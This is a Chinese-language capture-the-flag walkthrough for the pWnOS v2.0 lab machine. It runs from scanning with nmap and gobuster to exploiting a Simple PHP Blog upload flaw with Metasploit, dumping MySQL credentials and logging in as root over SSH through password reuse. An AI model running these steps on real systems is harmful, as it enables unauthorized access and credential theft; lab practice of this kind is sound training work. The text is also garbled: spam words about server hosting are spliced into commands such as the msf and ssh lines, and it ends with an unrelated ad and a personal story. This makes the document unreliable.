知识点总结:
1.通过模块来寻找漏洞
2.m服务器托管sf查找漏洞
3.通过网站源代码,查看模块信息
环境准备
攻击机:kali2023
靶机:pWnOS v2.0
安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub
在安装网址中看到,该靶机静态IP为10.10.10.100
所以我们就要修改虚拟机的”虚拟网络编辑器”
其次靶机的虚拟机设置如下:
开始渗透!
信息收集
收集IP(虽然已经知道了)
arp-scan -l
端口扫描
先大概看一下
nmap 10.10.10.100
再详细看一下
nmap -A -p- 10.10.10.100
看到内核版本等
访问一下80端口
扫一下目录
gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
扫到了/blog目录,访问
查看源代码
查看到建立博客的模块模版是Simple PHP Blog 0.4.0
漏洞查找
msf查找有没有现成的漏洞
search Simple PHP Blog 0.4.0
存在,那我们直接利用
use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog //填有该模块的url,此处写为uri
run //运行
shell //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")' //优化命令行
提权
查看一下目录
存在文件:mysqli_connect.php,看看
拿到数据库root密码,登录
看看能不能拿到相关账户密码,分别执行下述命令爆库
show databases;
use mysql;
show tables;
select * from user;
最后看到
看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!
但是我们可以用上面的那个密码再登录一下ssh试试
ssh r服务器托管oot@10.10.10.100
成功root!
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
先说一下自己的情况,本科生,19年通过校招进入广州某软件公司,干了接近4年的功能测试,今年年初,感觉自己不能够在这样下去了,长时间呆在一个舒适的环境会让一个人堕落!而我已经在一个企业干了四年的功能测试,已经让我变得不思进取,谈了2年的女朋友也因为我的心态和工资…